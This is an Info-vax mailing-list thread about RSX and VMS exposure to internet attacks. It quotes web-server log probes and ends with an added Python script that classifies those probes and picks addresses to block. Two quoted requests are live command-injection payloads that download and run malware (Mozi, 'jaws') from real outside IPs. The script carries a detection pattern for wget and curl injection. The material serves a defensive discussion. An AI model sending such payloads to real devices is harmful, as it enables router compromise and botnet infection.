[Info-vax] Anti-virus ?

plugh jchimene at gmail.com
Mon Aug 14 10:11:47 EDT 2023


On Monday, August 14, 2023 at 4:12:37 AM UTC-7, Johnny Billquist wrote:
> On 2023-08-12 12:59, plugh wrote: 
> > On Saturday, August 12, 2023 at 3:41:28 AM UTC-7, Johnny Billquist wrote: 
> >> On 2023-08-11 19:35, Simon Clubley wrote: 
> >>> Oh, and BTW, judging by the fact Eisner has needed to be rebooted multiple 
> >>> times over the years due to various services locking up presumably due to 
> >>> attacks, I have little confidence that VMS in general would be robust 
> >>> within an actively hostile environment. 
> >> I think you are misinterpreting some data, as well as making some 
> >> assumptions that I don't think are correct. 
> >> 
> >> By the way, I have an RSX system publicly on the internet, and it's 
> >> totally without firewalls, and on 24/7. Mainly to actually harden it. 
> >> But it's basically running stable without any issues since many years. 
> >> 
> >> So much for "hostile environment" being such a big problem. (Although I 
> >> should admit that I don't have some of the fancy services that are easy 
> >> to exploit...) 
> >> 
> >> Johnny 
> > 
> > It's that last part that is quite important these days. It's all about services now, as communication is so important. So much of this security stuff was known by Digital, such knowledge has simply been left to rot.
> Oh. But it's not that I don't have any services... I do have some. But I 
> guess it's a combination of me really into writing services that ever 
> execute something passed in, with the assumption that it will look fine. 
> I completely abhor the REST paradigm. It's such a poor idea from the 
> start. (I don't start ranting about people who embrace it...) 
> The other part being that RSX is such an odd system to start with that 
> pretty close to nobody even cares to try and figure out how to actually 
> exploit anything. They are just running various scripts and tools that 
> try to exploit usual, well known issues in various services. 
> 
> It's actually a very good way of finding out what issues are the most 
> common ones. I get plenty of probes for things in wordpress for example. 
> So that one seems popular (and bad). Netgear seems to also have some 
> popular exploits. Then apparently just badly setup CGI stuff in general. 
> 
> Examples: 
> 
> . GET /wp-login.php 
> 
> (seems to be just lots of these probing if wordpress is running on the 
> host, so lots of variations on this one...) 
> 
> 
> . GET 
> /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http:/60.189.27.88:43788/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 
> 
> (I think we can safely assume that 60.189.27.88 isn't an official site 
> of netgear configurations...) 
> 
> 
> . GET /shell?cd+/tmp;rm+-rf+*;wget+94.158.247.123/jaws;sh+/tmp/jaws 
> 
> (Do people really setup their web servers to have shell as a CGI???) 
> 
> 
> Those are just a few examples from just a couple of hours of logs on my 
> RSX machine... 
> 
> Johnny

How is RSX configured to respond to these requests? It's impressive how many of these requests can be stuffed into the pipeline from one IP.

I'm particularly impressed by attacks from soi-disant whitehats.

It was one of my first tests of generative AI: Translate the phrase “va fa culo” from Italian into at least 10 different languages including Klingon, Esperanto, English. Include at least one rte language

As part of a "get off my servers" message to one of them. It's a nice form of extortion.

It doesn't seem much use to have these sorts of logs with an active response component. Certainly writing emails is fun, but it can accomplish only so much. Most of the WordPress stuff has to be blocked by packet filtering after so many of these attempts from the same address. Some of these clowns have to invest serious money to get blocks of IP addresses from which to launch these attacks. Yes, WordPress certainly has a big target on its back: "Interesting birthmark you got there, Hal"
I mean, how many "get wplogin" requests do you allow before blocking that address? If the RSX system is just a honeypot, never mind.
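The per-address threshold asked about above, worked through as an added example that is not part of the thread: it parses common-log-format lines, labels each request as one of the probe kinds Johnny quoted (wp-login probing, command injection in a CGI query string, a shell exposed as CGI) and decides which client addresses to block. The log lines are constructed (RFC 5737 addresses, request paths taken from the quoted post), and the block policy and the `wp_threshold` default are assumptions.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote

# Constructed sample access log (common log format). Client addresses are RFC 5737
# documentation ranges; the request paths are the ones quoted in the thread.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Aug/2023:10:01:02 +0000] "GET /wp-login.php HTTP/1.1" 404 162
203.0.113.7 - - [12/Aug/2023:10:01:03 +0000] "GET /wordpress/wp-login.php HTTP/1.1" 404 162
203.0.113.7 - - [12/Aug/2023:10:01:04 +0000] "GET /blog/wp-login.php HTTP/1.1" 404 162
198.51.100.9 - - [12/Aug/2023:10:05:00 +0000] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http:/60.189.27.88:43788/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 162
198.51.100.9 - - [12/Aug/2023:10:05:01 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+94.158.247.123/jaws;sh+/tmp/jaws HTTP/1.1" 404 162
192.0.2.44 - - [12/Aug/2023:10:07:00 +0000] "GET /index.html HTTP/1.1" 200 1043
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')
# Shell separators or a fetch-and-run chain inside a CGI query string.
CMD_INJECT_RE = re.compile(r'(?:;|\|\||&&|\bcmd=|\bwget\b|\bcurl\b)', re.I)


def classify(path: str) -> str:
    """Label one request path as wp-probe, shell-cgi, cgi-cmd-injection or benign."""
    decoded = unquote(path).replace('+', ' ')   # undo URL encoding before matching
    route, _, query = decoded.partition('?')
    if route.endswith('/wp-login.php') or route.startswith('/wp-admin'):
        return 'wp-probe'
    if route == '/shell':                         # a shell exposed as a CGI endpoint
        return 'shell-cgi'
    if route.endswith('.cgi') and CMD_INJECT_RE.search(query):
        return 'cgi-cmd-injection'
    return 'benign'


def analyze(log_text: str, wp_threshold: int = 3) -> dict:
    """Tally probe labels per client and pick the clients to block.

    Policy (an assumption, not the thread's): a command-injection or shell-CGI hit
    blocks at once; wp-login probing blocks after wp_threshold hits from one address.
    """
    per_ip = defaultdict(Counter)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:                                     # skip lines not in common log format
            per_ip[m['ip']][classify(m['path'])] += 1
    block = {ip for ip, c in per_ip.items()
             if c['cgi-cmd-injection'] or c['shell-cgi'] or c['wp-probe'] >= wp_threshold}
    return {'per_ip': {ip: dict(c) for ip, c in per_ip.items()}, 'block': block}
```

Running `analyze(SAMPLE_LOG)` on the constructed log blocks the address that sent three wp-login probes and the one that sent the two CGI injection attempts, while the ordinary `/index.html` client is left alone.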
